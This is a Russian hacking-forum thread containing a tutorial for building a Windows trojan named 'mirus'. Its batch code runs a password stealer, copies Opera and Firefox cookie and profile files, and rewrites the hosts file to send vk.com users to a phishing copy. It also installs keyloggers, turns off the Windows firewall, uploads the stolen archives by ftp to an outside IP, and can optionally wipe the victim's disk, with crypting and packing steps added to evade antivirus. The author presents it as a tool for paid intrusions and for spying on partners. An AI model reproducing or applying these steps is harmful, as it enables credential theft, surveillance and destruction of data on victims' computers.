Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
Показано с 1 по 6 из 6
  1. #1
    TopicStarter
    Аватар для Sler

    Статус
    Offline
    Регистрация
    22.06.2014
    Сообщений
    117
    Репутация
    27 + / -
    Другое

    Вирус "mirus" или начало пути Хакера

    Вирус "mirus" или начало пути Хакера


    Программы и методы описанные в этой статье целиком попадают под 272 УК РФ, но они опубликованы здесь лишь для ознакомительных целей, а не для принесения кому либо вреда или нанесения вреда какому либо компьютеру. Я полностью снимаю с себя ответственность за использование этих методов и программ пользователями. Все истории, имена и т.д. являются вымышленными, любые совпадения случайны. Что еще надо написать, чтобы вы не придолбались ко мне со своим законом?


    "Кто владеет информацией - тот владеет миром"
    Ротшильд
    Введение
    Не помню когда именно и где именно я увидел цитату написанную выше, но так или иначе увидел. И именно этот момент я считаю началом всего того круговорота событий, который произошел и происходит далее, некоторые фрагменты из которого я собираюсь описать в этой статье. Я стал думать...стал делать то, что не умеет сейчас большинство.

    И думать я стал вот о чем: "сидя в своих контактиках мы деградируем, переписываясь ни о чем мы деградируем, и даже не понимаем, что по сути создаем сами на себя портфолио. По перепискам,в которых ты чувак за прошедшие несколько лет на ваял пару сотен тысяч знаков, можно восстановить все чем ты занимался это время. Да-да чувак, что ты там вякнул? Типо никогда не доверял этому тупому контактику и ничего важного не писал? Да брось, мы то оба знаем, что ты там ваял своей бывшей про смысл жизни, отношение к геям и во сколько и где с ней в очередной раз встретишься. Собственно, важную информацию представляет из себя только последний факт. Прикинь, если вместо твоей бывшей придет здоровенный амбал от парня, которого ты кинул на несколько лимонов, и выстрелит тебе в лоб. Теперь вопрос. Кто дал инфу этому амбалу о том где ты будешь находится в такое-то время? А инфу ему дал Некто. Некто, который знает все и обо всех, имеет доступ абсолютно везде, для которого нет запрета и законов...Некто, который владеет информацией и косвенно владеет миром. Так кто же он - этот Некто? Кто он - чья работа знать и узнавать? Это хакер."

    Примерно в таком вот пафосном и радужном настроении мелькали мысли в моей голове. Я естественно захотел стать этим хакером. Сейчас, спустя два года, я могу сказать, что мысли тогда были у меня немного наивные, но в целом правильные. Правда одного я тогда еще не знал - сколько придется работать, чтобы стать хакером, которого я себе представлял. Естественно за два года невозможно постичь столько информации, и хакером как таковым я себя не считаю и сейчас. Но я двигаюсь к этой цели и возможно, когда нибудь я стану тем, кем себя представлял два года назад. Ну а пока что, я хочу здесь поделиться со всеми своим опытом взлома и некоторыми методами, которыми я этого взлома достигал.

    Теория
    ВНИМАНИЕ: МНОГА БУКАВОК

    СПОЙЛЕР

    [Перечитав десятки книг Кевина Митника, Криса Касперского, Джеймса Фостера, Майка Прайса и других я понял одну замечательную вещь - хакерство как таковое состоит из двух составляющих: психологии и программирования. Если вы думаете, что обладая телепатией, красивой авой и хорошим слогом, жертва сама даст вам пароль - то вы глубоко ошибаетесь. Может быть такое чудо и возможно, но это при условии, если жертва наивный ребенок, и времени у вас по крайней мере пол года. Если же вы думаете, что вы вот так вот просто сели за комп, открыли пиво и за пять минут взломали пентагон и начали третью мировую - то вы еще более глубоко ошибаетесь. Опять же есть отдельные личности, которые обходятся чисто вторым методом, то есть программированием, без всякой там психологии и соц инженерии, но таких единицы по всему миру и это чертовы компьютерные гении, до которых и вам и мне как свинье до генерала. Итак, по одиночке, ни психология, ни программирование не работают. А вот если эти две науки попробовать слить воедино, то получиться именно то, что мы хотим - возможность любого взлома при наличии прямых рук и прокачанного мозга.]
    [свернуть]


    Короче говоря [СПОЙЛЕР], для тех кто ничего не понял - написать вирус и впарить вирус это разные вещи и любой хакер должен владеть и тем и другим в совершенстве.

    Итак, начнем мы с Теории, то бишь с написания вируса.

    Знаете, я выполнил уже достаточно много заказов на взлом, чтобы понять одну вещь - идеальных вирусов нет и никогда не будет, всегда приходится что-то доделывать, доштопывать, шифровать и так далее. Но тот вирус, который создал (вернее половину сп**ил) я и который хочу показать здесь, он скажем так, близок к идеальному. На самом деле в этом троянчике я многое позаимствовал, но тем не менее совесть меня не гложет, за то что я там что то чужое выдаю за свое, ибо до меня никто не задумывался соединить то, что я соединил. Вирусом этим я сам постоянно пользуюсь, он мой незаменимый товарищ в любой ходке ну и собственно поплыли к делу.

    Одну минуту - все файлы, которые у нас появятся в разработке вируса мы будем складывать в папку %APPDATA%\virusna

    За основу я взял готовый exe-шник от отличной программки UFR stealer . Немного об этой проге [описывается работа со стиллером, если вы опытный мазахакер, то можете не жмакать] - [по сути дела это самый популярный стиллер во всем рунете. Не только самый популярный, но еще и самый простой. Наглядно видно, что для создания exe-файла который будет воровать все кукисы (пароли) на компе жертвы достаточно всего-то выбрать путь для сохранения отчетов паролей (4-ый указатель, как видим, путей для сохранения там дофигище. Лично я всегда пользовался отправкой на FTP, и никогда еще эта хреновина меня не подводила) и жмакнуть на икону кубика (второй указатель). Создатели обещали, что воровать пароли их детище будет чуть ли не из всего мыслимого и немыслимого софта, как видим список действительно довольно велик (первый указатель), но на деле получилось, что после обновления эта хрень не смогла стащить даже пароли от лисички и оперы. У меня из за этого один заказ палевным получился.
    Думается мне, что как только другие браузеры тоже изменят пути к родимым кукисам, то прога эта станет абсолютно бесполезна. Но пока что она спокойно робит и тащит пароли из всего мыслимого и немыслимого софта за исключением фокса и оперы последних версий. Для открытия же пришедших отчетов нам всего лишь надо нажать на неведомую хрень под третьим указателем и пере рубиться на вкладку под пятым. Можно еще побаловаться с вкладкой "опции билда", но там почти все нерабочее, кроме запуска от имени админа. Тоже в принципе полезная фигня. Особенно, если жертва использует 8-ую винду. Там если от имени админа не запустить - все палевно будет]

    Итак, сначала качаем такую полезную хрень, как виртуальная машина, например virutal box и создаем там либо седьмую винду, либо восьмую. У обоих разница небольшая, больше заключающаяся в дизайне. Почему советую все ваши хакерские действия проводить на виртуальной машине - потому что, мало ли что, сделаете что нить не так и все, можете заказывать надгробие для вашей машинки. Если вы такой ламер, что впервые услышали слово "виртуальная машина" и в ваших глазах застыл знак вопроса, то качайте видео.

    Короче все, запустили виртуалку, теперь создаем в директории "%APPDATA%" папку "virusna", куда мы и будем соответственно пихать все файлы, которые появятся в разработке вируса. Пожалуй, объясню почему я выбрал именно директорию APPDATA. Дело в том, что для перехода в эту директорию, нам не надо прописывать полный путь к ней. Достаточно открыть проводник,написать слово "%APPDATA%", и умный хер сам переведет нас туда. Для других же директорий нам надо писать диск на котором размещается нужная папка, прописывать путь к ней, есть большая вероятность, что папка эта будет не там, где мы думаем, будет перемещена и так далее. С APPDATA же таких проблем нет, она всегда находится по указанному адресу, ее невозможно переместить. Мало того, она скрытая и просечь, что там вирус нереально.

    Итак, во первых создаем выше описанным UFR файл 1.exe (можете назвать по другому), который будет тащить кукисы абсолютно от всего кроме оперы и фокса и кидаем его в %APPDATA%\virusna. Берем обычный "NotePad" (ну или "блокнот", как вам заблагорассудиться, обычную писалку короче) и пишем такой код:

    1.start "%APPDATA%\virusna\1.exe" //командой start мы даем команду "открыть", а далее вводим адрес файла в кавычках
    Теперь будем писать троянский персонально для тех *удаков, которые юзают оперу или фокс. Я угробил несколько десятков минут своей жизни, и таки догнал, где хитрожопые кодеры оставили куки этих браузеров. Значит смотрите, для последней версии оперы путь %APPDATA%\Opera Software\Opera Stable, и там два файла без расширения - cооkies и cооkies-journal, которые собсно и хранят все родимые пароли. В случае с фоксом все немного посложней. Точно можно сказать, что есть путь %APPDATA%\Mozilla\Firefox\Profiles в котором есть папка с рандомным названием, которая и хранит все настройки профиля, всего его куки, истории и прочую хрень. Наша задача в этом случае скопировать не отдельно кукисы, а всю папку с настройками.
    Итак, пишем в нашем текстовом файле на второй строчке:

    2.xcopy "%APPDATA%\Opera Software\Opera Stable\cооkies." "%APPDATA%\virusna\opera\" /c/h //командой xcopy мы скопировали файл cооkies. в папку %APPDATA%\virusna\opera (этой папки пока что не существует, но он сам ее создаст в процессе), атрибутом /c мы дали понять батнику, чтобы он продолжал копировать файл даже если произошла ошибка, а атрибутом /h чтобы он копировал скрытые и системные файлы (файл который мы копируем именно таковым и является).

    3.xcopy "%APPDATA%\Opera Software\Opera Stable\cооkies-journal." "%APPDATA%\virusna\opera\" /c/h //как болванчики сделали все тоже самое, только с файлом cооkies-journal.

    4.xcopy "APPDATA%\Mozilla\Firefox\Profiles" "%APPDATA%\virusna\firefox\ /s/c/h //как болванчики сделали все тоже самое[2], только с папкой %APPDATA%\Mozilla\Firefox\Profiles.

    Я думаю, что все это очень просто и легко и не понять этого могут лишь отъявленные торчки. Если у вас возникли вопросы по этой теме - добро пожаловать в обсуждение, а лучше в открытое окно. Ничто не истинно, все дозволено.

    Терь второй этап - сейчас, мои маленькие любители экстремизма ((c) тесак), я научу вас доводить свою девушку до нервной истерии, потому что с помощью этой хрени вы будете знать о ней все.Это вам не воровать кукисы, которые еще непонятно будут или нет. Суть в том что такую штуку довольно тяжело найти в сети, и если даже нашли кое-что, то все равно необходимы хоть какие-то навыки обращения с кнопкной включения компутера. Короче, господа, прикиньте - вы входите на свой любимый сайтец (я про куртизанок), а там на всю страницу надпись "ХОРОШ АНОНИРОВАТЬ!" и всевидящее око массонов поставлено. Итак, что вы будете делать? Многие тут же упадут в обмарок решив, что у них галлюцинации и пора заканчивать с той замечательной травкой...люди же поумнее обратят свой взор на адресную строку сайта, ибо фокус с фейками уже давно всем известен и никому особо не доставляет. Ну понятное дело они там обнаружат где нить вместо нормального адреса сайта какую-нить опечатку и все сразу встанет на свои места. Но прикиньте...никакой опечатки, родной redtube.ком вместо того, чтобы показывать как накачанные альфа-самцы жарят какую нить няшную азиатку показывает надпись "ХОРОШ АНОНИРОВАТЬ!". Тут знаете ли может сделаться очень худо, и показаться, что по админам порно портала плачет кащенко кровавыми слезами. На самом деле все не так плохо - секрет в так называемом файле hosts. Его путь начиная с XP и заканчивая 8-оркой - %SystemRoot%\system32\drivers\etc .Когда Билл Гейтс был бухой в стельку он решил немного помочь несчастным хакерам в краже паролей люто ненавидимых им пользователей и создал этот дьявольский файл. Я так до конца и не разобрался в сути этого файла, если те так интересно - почитай википедИю, но профит в том, что если в нем напротив любого адреса сайта написать ай-пи другого, то при переходе на первый, бразуер будет автоматом редиректить на второй. То есть если напротив адреса сайта mail.ru поставить ай-пи адрес google.ru, то ты, чайник с отбитым носикоом , никогда больше не будешь пользоваться этим дебильным порталом рассчитаным на тупое стадо (майл ру как нить переживет эту страшную потерю). Так что если кто то сделает это с твоим компом, то не забудь поблагодарить его, он по сути избавил твой мозК от еще большего деградирования. Ну а теперь, уважаемый, давай подумаем какие безграничные возможности открывает перед нами этот файл. Мы можем просто сделать фейк контаГтиГа, залить его на хостинг с выделенным ip-адресом, немного подретактировать файл hosts у жертвы на компутере, показать небольшое знание социальной инженерии и вуаля - родимый парольчик жертвы от контаГтиГа у нас. Теперь же, давай добиваться этого всеми сподручными нам средствами.

    Персонально для смурфиков, нормальные пацаны могут не читать[Для начала разберемся что такое фейк. Фейк это точное повторение страницы, допустим того же контакта, но с учетом того, что любое вбитое слово в поле "логин" и "пароль" при последуещей авторизации тут же отправяется нам. Для тех нубов, кто ниче не понял - прикинь, ты открываешь контактиГ, вводишь свой логин и пароль, жмакаешь на "войти", и..либо ничего не происходит, либо тебя еще раз переводят на страницу входа контакта (настоящую). А я в это время получаю все то что ты ввел в этих полях. Круто да? Это короче как два абсалютно одинаковых сайта, только один насятощий, а другой поддельный, и различить эти сайты можно только по адресной строке. Например если настоящий будет выглядеть как vk.com, то поддельный vc.com или vkk.com ну и так далее, потому что два сайта с одинаковым адресом зарегать нереально. Вернее реально, но об этом чуть позже.]

    Итак, сделать фейк можно двумя способами - ручками(ручной) и ручками программеров(программный). Вручную мы сейчас делать нихрена не будем, ибо в твоих глазах навечно поселиться знак вопроса, а это никому не нужно. Все остальные юзеры с чувством самосохранения качают эту прогу - [[Только зарегистрированные могут видеть это. ] и запускают ее. Коротко распишу интерфейс программы и как ею пользоваться -
    1 - собсно, поле для адреса сайта, который мы хотим скопировать
    2 - переадресация, после того как жертва ввела свой логин и пароль и нажала на "войти" ее должно перебросить на сайт который вы впишите здесь. В большинстве случаев, кстати, не робит.
    3 - хочешь сломать себе мозК и ничего не понять? тебе сюда.
    4- список шаблонов самых популярных, всмысле копирования, сайтов. То есть, если тебе лень вбить самому в поле 1 vk.com - но за тебя это сделает программа. Кстати шаблоны там давно устарели и на данный момент существует куча разниц в дизайне на данный момент.
    5 - тип страницы которую ты хочешь сохранить.
    6 - формат файла, в который будут сохраняться логин и пароль жертвы - сразу же ставим на "своя" и .dat заменяем на .txt
    7 - пароли отсылаются на почту. геморройно и вряд ли робит.
    8 - замена слов на сайте который копируем, допустим если на сайте было - "добро пожаловать на наш сайт", то с помощью этой хни ты можешь заменить на "пшел вон, с нашего сайта".
    9 - кнопочка "создать", жмакнув на нее вы должны выбрать, что именно должен сохранять фейк (в нашем тяжелом случае это - login,pass, email и так далее)

    Теперь короче, после того как мы создали все файлы, у нас в папке где лежит программа появятся три файла -
    base3124.txt
    index.php
    login.php

    Теперь пойдет самое интересное - заливание на хостинг. Идем допустим сюда - hostinger.ru, побырому регаемся, идем на реганье новый хостингов и выбираем "бизнес"-хостинг за 269 рублей, это единственный хостинг где дают выделенный ip-адрес, а без него никак. Для евреев, которые бояться растаться с рублями, на которые можно купить водочку "славянское застолье" и колбасы к ней есть идеальное решение. Я сейчас не про массовое самоубийство, а про то, что в этом ахрененном сервисе есть так называемая "реферальная система". Суть в том, что за реганье по твоей ссылке тебе дают разные крутые ачивки. Вплоть до радиоупровляемого вертолетика за 50 человек. Но нам радиоуправляемый вертолетик не нужен, нам нужно всего лишь "увеличение ресурсов аккаунта" до трех человек. Тогда мы сможем получить платный бизнес-хостинг бесплатно. Итак, начинаем рассылать спам своим друзьям "зарегайся по ссылочке" и ждем, когда все друзья нас пошлют нахрен и тогда с чистой совестью отправляемся в клуб анонимных закомплексованных дегенератов (КАЗД) и начинаем всем иметь мозги на тему "все друзья меня предали и бросили и жизнь гавно и ля-ля-ля-ля...". Естественно никакого спама рассылать не надо. И никаких друзей приглашать тоже. Просто надо освоить так называемую "смену ip-адреса для хитрожопых людей" с помощью проги "tor", зарегать по своей ссылке трех фейков и вуаля, не успеешь оглянуться, а ты уже круче чем Д'артаньян! Ах, да, оглянуться ты к сожалению успеешь, потому что надо чтобы твои рефералы были активными, а для этого надо, чтобы с момента их реганья прошло полтора месяца + у них должон быть хоть один сайт наполненный контентом. Не, ну а шо ты хочешь? не все так тупы настолько, насколько бы тебе этого хотелось.
    ____
    Ждем полтора месяца либо отказываемся от водки “славянское застолье”
    ____
    Итак, проплаченный аккаунт у нас есть - теперь регаем “бизнес хостинг” (желательно имя давать похожее на сайт, который мы хотим срисовать), заходим в панель управленя аккаунтом, заходим во вкладку FTP Доступ, там написаны наши данные
    данные. Теперь качаем эту замечательную прогу “filezilla”, устанавливаем (главное случайно не установить всякие тулбары, которые они нам попытаются втюхать), теперь во вкладке “хост” прописываем FTP ip из данных, во вкладке “Имя пользователя” “FTP пользователь” и во вкладке пароль прописываем пароль который мы давали при реганье аккаунта.
    Далее удаляем все файлы в папке “publick HТМL” и подгружаем свои файлы -
    base3124.txt
    index.php
    login.php

    Теперь едем на сайт и там должна стоять точная копия сайта, который мы срисовали. Если же вместо русских букв там вопросительные знаки, то открываем файл index.php в обычной писалке, сохраняем и при сохранении указываем другую кодировку (UTF 8). Не забудь проверить, что ты сохранил index.php, а то такой суслик как ты пожалуй еще и сохранит “index.php.txt” DDD

    Теперь пойдет самое интересное - редактирование файла hosts.

    В информации об аккаунте твоего сайта должна быть инфа об твоем выделенном ip адресе этого сайта - копируем этот адрес, у меня он будет допустим 176.103.49.74

    И в коде нашего вируса я дописыаю такую строчку - Echo 176.103.49.74 https://vk.com>>"%SystemRoot%\system32\drivers\etc\hosts"
    Отлично:3 Теперь если на своем компутере жертва захочет выйти на свой милый контактиг у нее это сделать не получиться, ее будет редеректить на мой фейк) А если она откроет свой файл hosts, то увидит в нем строчку Echo 176.103.49.74 [Только зарегистрированные могут видеть это. ] за которой ее и редеректить на мой фейк) Но жертва глупа и бездарна, и вряд ли она полезет в закрома операционных систем) На то она и жертва...

    ___
    Теперь этап третий - будем ставить кейлоггеры. Если ты, ламер эдакий, не знаешь что это такое - то вот тебе объяснение (крутые мазахакеры могут не читать) - кейлоггер, эт такой хомячеГГ, который работает не хуже спецпоразделений КГБ.

    Он, кароч, любое твое жмаканье мышкой, любое твое нажатие на клавиатуру, любой твой заход на любимый ред туб, любое набранное сообщение тут же отсылает мне на почту, фтп-шку или куда там еще. Вообщем, дорогой друг, если после прочтения этих строчек врачи заподозрили у тебя паранойю - то вполне возможно, что ты обо всем думаешь правильно.

    Как таковых, существуют два вида кейлоггеров - с удаленной установкой и без удаленной установки. Кому нужен второй вид - я без понятия, потому что чем пытаться физически вручную установить вирусню на комп своего друга легче его допустим начать пытать. И сил умственных меньше потребуется и нервов и времени. Ну а коли товариСЧ про которого вы хотите узнать все - товарищем как бэ и не является, то забудьте идею с вторым видом вообще как страшный сон. А кейлоггеров первого вида, надо сказать, очень мало. Я тут весь гугл обрыл и накопал парочку, которые нам нужны.

    Первый - это кейлоггер detective . Охренненая штуковинка, вообще антивирями палиться не должна, но есть большая вероятность того, что там будут пропускаться буквы а п р f g h.

    Я не знаю какой пережравшийся анаболиков яйцеголовый дегенерат может здесь чего-то не понять, но на случай, что среди аудитории чтецов этой статьи все-же такие найдутся - расписываю подробно-
    1.строка e-mail, вписываем туда свое мыло - при профите на него получаем все логи
    2.вписываем туда пароль от мыла (для сомневающихся - прога будет авторизоваться под твое мыло, затем с этого мыла на это же мыло логи отправлять)
    3.самоудаление, в случае если тебя задолбают отчеты на почте о том, что твой друг опять ограбил банк - количество дней, через которые прожка удалиться.
    4.серийник - вот вам кряГ, вписываете туда свое мыло, он вам дает серийник - получаем профит и радуемся жизни.

    Итак, после того как все сделали - на рабочем столе у вас должен появиться exe-шник autoinstaller.exe. [тут же перемещаем его в %APPDATA%\virusna]. Вот запустите этот exe-шник на компе жертвы и все, все логи от ее мышки и клавы тут же летят к вам на почту.

    Теперь не ссым и докидываем в код такую строчку -
    start "%APPDATA%\virusna\autoinstaller.exe"
    Теперь второй кейлоггер - GKLSpy
    Надо сказать, что это реально крутой и простой в использовании кейлоггер. Немного расскажу об использовании этого кейлоггера

    1.Вписываем адрес сайта зареганого на хостингере
    2.Вбиваем логин
    3.Вбиваем пароль
    4.Оставляем без изменений
    5.Сюда вбиваем пароль, для просмотра логов.
    6.Жмакаем на кнопку build

    В папке с кейлоггером у нас должен появится файл server.exe. При включении этого файла автоматом врубается кейлоггер и отправляет все логи на хостинг.

    Дописываем в код такую строчку -
    start "%APPDATA%\virusna\server.exe"

    Терь этап четвертый. И самый последний. На самом деле я еще много чего мог сюда прибавить, и обязательно прибавлю в других частях, если эта статья будет пользоваться успехом. Ты же хочешь узнать о доступе к командной строке жертвы, доступе к диспетчеру устройств, о скрытом наблюдении за компом, взломе веб камеры, отрублении фаерволов и антивирусов, беспалевном внедрении вируса на комп лузера и так далее? Если хочешь, то все зависит от тебя, если реакция народа на эту статью будет нормальной - то я продолжу ваять выпуски, правда более углубленные чем этот. Здесь же я еще покажу тебе лишь то, как крыть компутер после получения логов. Итак, этап четвертый. Добавляется по желанию, как острые специи в рецепте с жареной курицей. Если ты люто ненавидишь жертву и желаешь ее скорейшей смээээрти - то сейчас я тебе покажу как по крайней мере накрыть ее комп с превращением в кашицу файлов на жестком диске. Если же ты хочешь, чтобы твой взлом остался незамечен и особого неприятия к жертве не испытваешь - просто пропусти этот этап.

    Чтож, если ты решился - начнем. Для начала опять же качай порогу - wishmaster
    Предупреждение - ни в коем случае не запусти это прогу случайно у себя - последствия будут плачевными.
    Несколько лет назад моя команда написала эту программу и за ее работоспособность я отвечаю.

    Итак, помещаем wishmaster.exe в папку %APPDATA%\virusna
    Теперь подумаем, нам надо чтобы эта прога убила комп жертвы только после того, как пароли отошлются нам на сервяк и мы все узнаем. Это где то минута, две, ну на всякий случай три минуты. Три минуты это 180 сек. 180 сек это 180000 миллисекунд. Нам нужно 180000 миллисек времени, поэтому сначала создаем новый текстовый файл и пишем такую строчку -
    ping -n 1 -w 180000 192.138.014.014 >nul // мы пытаемся пропинговать адрес 192.138.014.014 которого не существует. Ждем 180000 миллисекунд и затем просто убиваем весь вывод пинга.

    start "%APPDATA%\virusna\wishmaster.exe" //стартуем whishmaster.exe

    Далее сохраняем этот файл с расширением .bat в папке %APPDATA%\virusna с названием startwishmaster.bat
    Когда мы склепаем вирус мы будем все .bat переводить в .exe, так что в основном коде добавляем строчку -
    start startwishmaster.exe

    Вот вроде бы и все. Простейший вирус написан, осталось его только склепать. Он конечно будет палиться почти всеми антивирями (почти всеми, в конце мы пропустим его через криптор, но особо много надежд на это не возлагайте), о том как сделать чтобы он был беспалевен будет мой следующий выпуск. Ну или послеследующий.

    Сейчас же, давай наконец склеем все это дело.

    Итак, для начала отрубим брэндмауэр, чтобы он не блокировал отсылку наших кукисов (пункт 1) к нам. Для этого вставим в наш код такую строчку -
    netsh advfirewall set allprofiles state off //полностью отрубает брэндмауэр винды
    Вообще, эту строчку было бы неплохо вставить вообще в самое начало кода. Заново все скрины переделывать я не собираюсь, а вот ты вполне сможешь это сделать.

    Теперь заставим отправлять нам кукисы с компа жертвы [как мы помним, все остальные проги отправляют нам логи либо на ftp, либо на почту].
    Итак, как мы помним - все кукисы мы сохранили в папку %APPDATA%\virusna\opera и папку %APPDATA%\virusna\firefox, теперь мы должны эти две папки заархивировать и отправить на наш ftp сервер. Потому что просто папки, без архивации, передать на сервяк путем .bat нельзя. А в этом уроке мы будем пользоваться только средствами командной строки.

    Архивировать их мы будем с помощью проги win rar и по идее она должна быть установлена в винду по умолчанию, но мало ли что, сейчас ее все больше меняют на другие архиваторы, так что если мы тихо установим ее еще раз - ничего страшного не будет.
    Итак, качаем эти два инсталлера тихой установки win rar для x32 и x64
    Называем их x32 и x64, перекидываем их в папку %APPDATA%\virusna и докидываем в код вот такие строчки -
    start "%APPDATA%\virusna\x32.exe"
    start "%APPDATA%\virusna\x64.exe"
    Отлично, теперь ждем 8 секунд, а вернее 8000 миллисекунд пока установится win rar
    ping -n 1 -w 4000 192.138.014.014 >nul
    Далее архивируем папку с кукисами такой командой:
    set SrcPath="%APPDATA%\virusna\opera" //говорим компу какую папку надо архивировать
    set DestPath=”%APPDATA%\virusna” //говорим компу в какую папку надо запиливать архив
    set ArhName=opera //говорим компу имя архива
    "C:\Program Files\WinRAR\WinRAR.exe" a -m5 -s -y -ep1 -r %DestPath%\%ArhName%_.rar %SrcPath%\*.* //даем компу инструкцию, шобы он запустил win rar и архивировал все это в скрытом режиме

    Терь как болвнчики[2] делаем тоже самое с папкой firefox
    set SrcPath="%APPDATA%\virusna\firefox"
    set DestPath=”%APPDATA%\virusna”
    set ArhName=firefox
    "C:\Program Files\WinRAR\WinRAR.exe" a -m5 -s -y -ep1 -r %DestPath%\%ArhName%_.rar %SrcPath%\*.*

    Терь пацаны, нам надо отправить эти два отчета на наш ftp сервяк. Поэтому создаем в папке %APPDATA%\virusna сначала файл ftp_command.txt и в нем пишем такие строчки -
    u296220006 //логин входа на твой ftp сервяк
    12345678910 //пароль входа на твой ftp сервяк
    lcd %APPDATA%\virusna\firefox.rar //выбираем файл с куками
    mput /s * //подгружаем его на наш сервяк

    терь делаем все тоже самое только с opera.rar - создаем файл ftp_command2.txt и пишем в нем код:
    296220006
    12345678910
    lcd %APPDATA%\virusna\opera.rar
    mput /s *

    Далее дописываем в наш основной код:
    ftp -s:ftp_command.txt -i 185.28.20.65 //с помощью команды ftp и с помощью раннее созданного файла отправляем файл на ip адрес сервера (у тебя он будет другим)
    ftp -s:ftp_command2.txt -i 185.28.20.65 //тоже самое только со вторым файлом
    __
    Ну вот и отлично. Последний этап вроде бы пройден...

    Теперь сохраняем файл в папку %APPDATA%\virusna c именем mirus.bat (обращаю внимание, мой уважаемый, что нужно именно mirus.bat а не mirus.bat.txt)

    Вот так вот чувак. Сейчас мы еще склепаем этот наш вирь, но это даже не этап, это просто херня легкая. Качаем такую вот замечательную прожку, как bat to exe converter , запускаем ее.
    .
    Указываем под пунктом 1 путь к нашему батнику, в пункте два указываем путь к выходу готового exe-шника. Затем в пункте 4 ставим, чтобы приложение было невидимо, ну и все, под пунктом пять жмакаем “комипилировать” и ищем по пути вывода готовый скомипилированный файл.
    Далее:
    Для тех кто решил убить комп жертвы -
    тоже самое делаем с ранее созданным wishmaster.bat и добавляем его в ту же папку.

    Теперь качаем такую вот хрень как OXI Joiner (вообщето не хрень, а замечательная прога). С ее помощью мы можем склеить сразу несколько файлов будь то вирусы или обычные картинки. Так же она нам поможет помочь тем, что с помощью нее можно добавить файлы в автозапуск и каждый раз когда у жертвы будет врубаться комп - будет тут же запускаться наш вирь. На этапе нуба, для которого я пишу эту статью - это самый быстрый способ.

    Вообщем жмакаем на пункт 1, добавляем наш основной файл mirus.bat
    Для тех кто зловредные мудаки - добавляем еще и wishmster.bat
    Для тех кто не зловредные мудаки - кликаем правой кнопкой мышки по mirus.bat, выбираем “свойства” и там ставим галку напротив “скрытый” и “добавить в автазагрузку”. Далее возвращаемся в основной уровень и кликаем на кнопку под пунктом 3. Выбираем куда сохранять файл и его расширение. Пусть это будет папка %APPDATA%\virusna, а файл будет называться mirus.exe
    Из %APPDATA%\virusna файл mirus.bat и для зловредных wishmaster.bat можно уже смело удалять.

    Теперь качаем такую замечательную прогу, как Hexagon Crypter
    Это криптор, один из лучших в своем роде. Пропустив через него свой файл ваш вирь еще долгое время не будут банить вообще никакие вири. Интерфейс там интуитивно понятный и я его даже расписывать не буду.

    Когда мы на выходе получим готовый файл мы должны сделать последний штрих - берем win rar. Обыкновенный win rar. Жмакаем на “добавить архив” и во вкладке “общее” даем окончательное название - mirus.rar, затем жмакаем на “создать SFX-архив” и у нас автоматом имя превращается в mirus.exe.

    Затем жмакаем на вкладку “файлы”, и там просто скопом тащим все файлы из %APPDATA%\virusna. Потом идем во вкладку “дополнительно” и там жмем - параметры SFX. В параметре “общие” в путь для распаковки вводим - %APPDATA%\virusna, затем перерубаемся на вкладку “установка” и там в поле “выполнить после распаковки” вводим - mirus.exe
    Затем переходим во вкладку “режимы” и там выбираем пункт “скрыть все”.

    Далее сохраняем все это, перерубаемся на вкладку “общие” и там жмакаем OK. Все, по адресу который вы ввели у нас должен появится mirus.exe. Это и есть наш вирус.

    Итак, мы написали крутой вирь и как бог дал заклепали его. Вирус получился довольно громоздким, но что ты хотел чувак, это хакерство. Без труда не выловишь и рыбку из пруда.


    ____________________________________
    Просьба не кидаться какашками...
    Отредактировал как смог=)
    ____________________________________
    Спасибо - programmistmax2 за статью
    ____________________________________
    Стырено с forum xakep ru
    ____________________________________
    Последний раз редактировалось admin; 14.07.2014 в 15:54.
    Не обманешь судьбу и не купишь любовь
    Ни за жизнь, ни за смерть, ни за горсть серебра.
    И холодная сталь ляжет под ноги вновь
    Равновесием зла и добра.

  2. 3 пользователя(ей) сказали cпасибо:
  3. #2
    Аватар для sata-ata

    Статус
    Offline
    Регистрация
    29.10.2013
    Сообщений
    3,034
    Репутация
    282 + / -
    Программист
    в песочницу ттакое выкладывайте!!!
    8AC4F56356469F79B5283364053ACDA49D8EC9FEFDADC2B42F A5B4E979D9222267583F350BF9

    с/delphi/pascal/vbs/vbm/bat
    Ник зареган, суки! [Только зарегистрированные могут видеть это. ]

  4. #3
    TopicStarter
    Аватар для Sler

    Статус
    Offline
    Регистрация
    22.06.2014
    Сообщений
    117
    Репутация
    27 + / -
    Другое
    Цитата Сообщение от sata-ata Посмотреть сообщение
    в песочницу ттакое выкладывайте!!!
    чет я забыл что есть песочница=)
    p.s. привет!
    Не обманешь судьбу и не купишь любовь
    Ни за жизнь, ни за смерть, ни за горсть серебра.
    И холодная сталь ляжет под ноги вновь
    Равновесием зла и добра.

  5. #4
    Аватар для tyman

    Статус
    Offline
    Регистрация
    12.09.2013
    Сообщений
    310
    Репутация
    78 + / -
    Хакинг
    я слышал эту цитату в фильме "Матрица"
    .|.

  6. #5
    Аватар для tyman

    Статус
    Offline
    Регистрация
    12.09.2013
    Сообщений
    310
    Репутация
    78 + / -
    Хакинг
    И еще, роуртер, единственная проблема отправки файлов, качать можно, план херня, но новичкам пойдет.
    .|.

  7. #6
    TopicStarter
    Аватар для Sler

    Статус
    Offline
    Регистрация
    22.06.2014
    Сообщений
    117
    Репутация
    27 + / -
    Другое
    Спасибо Админу за то что сделал текст читабельным)
    Не обманешь судьбу и не купишь любовь
    Ни за жизнь, ни за смерть, ни за горсть серебра.
    И холодная сталь ляжет под ноги вновь
    Равновесием зла и добра.

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  

Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.